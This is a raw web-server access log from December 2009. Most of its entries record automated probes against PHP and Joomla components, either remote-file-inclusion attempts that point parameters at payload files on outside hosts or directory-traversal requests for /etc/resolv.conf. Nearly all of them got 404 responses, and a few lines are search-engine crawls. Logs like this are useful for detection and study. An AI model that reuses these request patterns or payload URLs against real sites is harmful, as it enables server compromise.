125.160.17.200 - - [28/Dec/2009:04:11:04 -0800] "GET /logs/access_090713.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:04:11:05 -0800] "GET /logs/access_090831.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.43.211.154 - - [28/Dec/2009:04:11:18 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dohio.org/joomla/media/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
82.165.193.182 - - [28/Dec/2009:04:12:02 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://waynesed.com//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.165.193.182 - - [28/Dec/2009:04:12:03 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://waynesed.com//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [28/Dec/2009:04:12:24 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.xenguide.pe.kr/log/plug_in_config/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [28/Dec/2009:04:12:24 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.xenguide.pe.kr/log/plug_in_config/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [28/Dec/2009:04:12:24 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.xenguide.pe.kr/log/plug_in_config/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:04:12:33 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:04:12:49 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:04:13:00 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:04:13:11 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:04:13:21 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
203.172.162.163 - - [28/Dec/2009:04:14:28 -0800] "GET /xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:04:14:34 -0800] "GET /logs/access.log%20%20/home.php?content=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [28/Dec/2009:04:14:34 -0800] "GET /home.php?content=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [28/Dec/2009:04:14:34 -0800] "GET /logs/home.php?content=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [28/Dec/2009:04:14:35 -0800] "GET /home.php?content=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [28/Dec/2009:04:14:35 -0800] "GET /logs/access.log%20%20/home.php?content=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [28/Dec/2009:04:14:35 -0800] "GET /logs/home.php?content=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [28/Dec/2009:04:14:43 -0800] "GET /port.php?content=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [28/Dec/2009:04:14:43 -0800] "GET /logs/access.log%20%20/port.php?content=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [28/Dec/2009:04:14:43 -0800] "GET /logs/port.php?content=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.230.148.68 - - [28/Dec/2009:04:14:52 -0800] "GET /logs/access_090706.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.xenguide.pe.kr/log/plug_in_config/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:04:17:19 -0800] "GET /logs/access_090608.log/homepage.php?sel=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:04:17:19 -0800] "GET /logs/access.log/homepage.php?sel=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [28/Dec/2009:04:17:47 -0800] "GET /logs/access_090608.log/homepage.php?sel=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:04:17:47 -0800] "GET /logs/access.log/homepage.php?sel=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [28/Dec/2009:04:17:57 -0800] "GET /port.php?content=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [28/Dec/2009:04:17:58 -0800] "GET /logs/access.log%20%20/port.php?content=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [28/Dec/2009:04:17:58 -0800] "GET /logs/port.php?content=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.250.252.242 - - [28/Dec/2009:04:18:16 -0800] "GET /logs/access_091130.log HTTP/1.1" 200 7662334 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
211.230.148.68 - - [28/Dec/2009:04:19:44 -0800] "GET /logs/access_091221.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.xenguide.pe.kr/log/plug_in_config/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [28/Dec/2009:04:19:49 -0800] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.xenguide.pe.kr/log/plug_in_config/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.147.237 - - [28/Dec/2009:04:20:04 -0800] "GET /logs/access_091221.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysteryshop.org/shoppers/resourcecenter/chatinc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:04:20:20 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.223.205.250 - - [28/Dec/2009:04:20:20 -0800] "GET /logs/access.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.223.205.250 - - [28/Dec/2009:04:20:20 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.147.237 - - [28/Dec/2009:04:21:00 -0800] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysteryshop.org/shoppers/resourcecenter/chatinc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [28/Dec/2009:04:22:56 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:04:23:45 -0800] "GET /logs/access.log/home.php?content=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [28/Dec/2009:04:23:49 -0800] "GET /logs/access.log/home.php?content=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.195.37.190 - - [28/Dec/2009:04:28:59 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
67.195.37.190 - - [28/Dec/2009:04:29:00 -0800] "GET /cendoc/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
209.92.156.53 - - [28/Dec/2009:04:33:18 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ourfathersworld.org/wp-content/themes/default/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:04:33:18 -0800] "GET /logs/access_090706.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ourfathersworld.org/wp-content/themes/default/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:04:33:18 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ourfathersworld.org/wp-content/themes/default/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:04:36:55 -0800] "GET /logs/access_090706.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ourfathersworld.org/wp-content/themes/default/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:04:36:55 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ourfathersworld.org/wp-content/themes/default/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:04:36:55 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ourfathersworld.org/wp-content/themes/default/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:04:37:43 -0800] "GET /logs/access_090629.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ourfathersworld.org/wp-content/themes/default/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:04:44:47 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
124.115.1.62 - - [28/Dec/2009:04:49:33 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:04:52:59 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:04:52:59 -0800] "GET /logs/access_090921.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:04:52:59 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:04:53:16 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
65.55.207.93 - - [28/Dec/2009:04:54:10 -0800] "GET /labia/?N=A HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.195.37.161 - - [28/Dec/2009:04:54:44 -0800] "GET /?M=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:04:56:40 -0800] "GET /logs/access_090921.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:04:56:41 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:04:56:41 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:04:58:00 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:04:58:04 -0800] "GET /logs/access_090622.log/homepage.php?sel=http://ourfathersworld.org/wp-content/themes/default/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:04:58:04 -0800] "GET /homepage.php?sel=http://ourfathersworld.org/wp-content/themes/default/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:04:58:04 -0800] "GET /logs/homepage.php?sel=http://ourfathersworld.org/wp-content/themes/default/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:04:58:04 -0800] "GET /logs/access_090629.log/homepage.php?sel=http://ourfathersworld.org/wp-content/themes/default/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:04:58:53 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.62.128.254 - - [28/Dec/2009:04:58:54 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.62.128.254 - - [28/Dec/2009:04:58:54 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:04:59:58 -0800] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:04:59:58 -0800] "GET /logs/access.log%20%20//skin/ggambo7002_board/setup.php?dir=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:04:59:58 -0800] "GET /skin/ggambo7002_board/setup.php?dir=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:00:23 -0800] "GET /logs/access_091221.log%20%20//skin/ggambo7002_board/setup.php?dir=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:05:01:02 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:03:04 -0800] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [28/Dec/2009:05:07:36 -0800] "GET /logs/access_090706.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:05:10:20 -0800] "GET /logs/access_090921.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:05:10:57 -0800] "GET /logs/access_090810.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:05:10:57 -0800] "GET /logs///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:05:11:00 -0800] "GET /logs/access_091102.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:05:11:00 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:05:11:27 -0800] "GET /logs/access_091102.log%20%20///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:12:49 -0800] "GET /logs/access_090921.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:12:49 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:12:49 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:05:15:09 -0800] "GET /logs///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:05:15:19 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:05:15:19 -0800] "GET /logs/access_091102.log%20%20///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:05:15:22 -0800] "GET /logs///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:05:15:42 -0800] "GET /logs/access_091102.log%20%20///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [28/Dec/2009:05:16:03 -0800] "GET /logs/access_090810.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.237.17 - - [28/Dec/2009:05:16:27 -0800] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.237.17 - - [28/Dec/2009:05:16:27 -0800] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.237.17 - - [28/Dec/2009:05:16:27 -0800] "GET /logs/access_090601.log///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.237.17 - - [28/Dec/2009:05:17:05 -0800] "GET /logs/access_090810.log///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.118 - - [28/Dec/2009:05:18:41 -0800] "GET /labia/?D=A HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:05:19:44 -0800] "GET /logs/phphtml.php?htmlclass_path=http://ourfathersworld.org/wp-content/themes/default/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:05:19:44 -0800] "GET /phphtml.php?htmlclass_path=http://ourfathersworld.org/wp-content/themes/default/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:05:19:44 -0800] "GET /logs/access_090615.log/phphtml.php?htmlclass_path=http://ourfathersworld.org/wp-content/themes/default/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:19:59 -0800] "GET /logs/access_090720.log//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:19:59 -0800] "GET /logs/access_090720.log//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:19:59 -0800] "GET /header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:19:59 -0800] "GET /logs/access_091123.log//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:20:00 -0800] "GET /logs//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:20:00 -0800] "GET /logs/access_091123.log//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:20:00 -0800] "GET /logs//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:20:00 -0800] "GET /header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
211.47.237.17 - - [28/Dec/2009:05:20:05 -0800] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.237.17 - - [28/Dec/2009:05:20:05 -0800] "GET /logs/access_090601.log%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.237.17 - - [28/Dec/2009:05:20:05 -0800] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:05:20:34 -0800] "GET /logs/access_090615.log%20%20/phphtml.php?htmlclass_path=http://ourfathersworld.org/wp-content/themes/default/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.237.17 - - [28/Dec/2009:05:20:35 -0800] "GET /logs/access_090706.log///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.237.17 - - [28/Dec/2009:05:20:35 -0800] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.237.17 - - [28/Dec/2009:05:20:36 -0800] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:20:44 -0800] "GET /logs/access_091026.log//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:20:45 -0800] "GET /logs/access_091026.log//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:05:20:59 -0800] "GET /logs/access_090824.log%20%20/phphtml.php?htmlclass_path=http://ourfathersworld.org/wp-content/themes/default/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:21:00 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.62.128.254 - - [28/Dec/2009:05:21:00 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
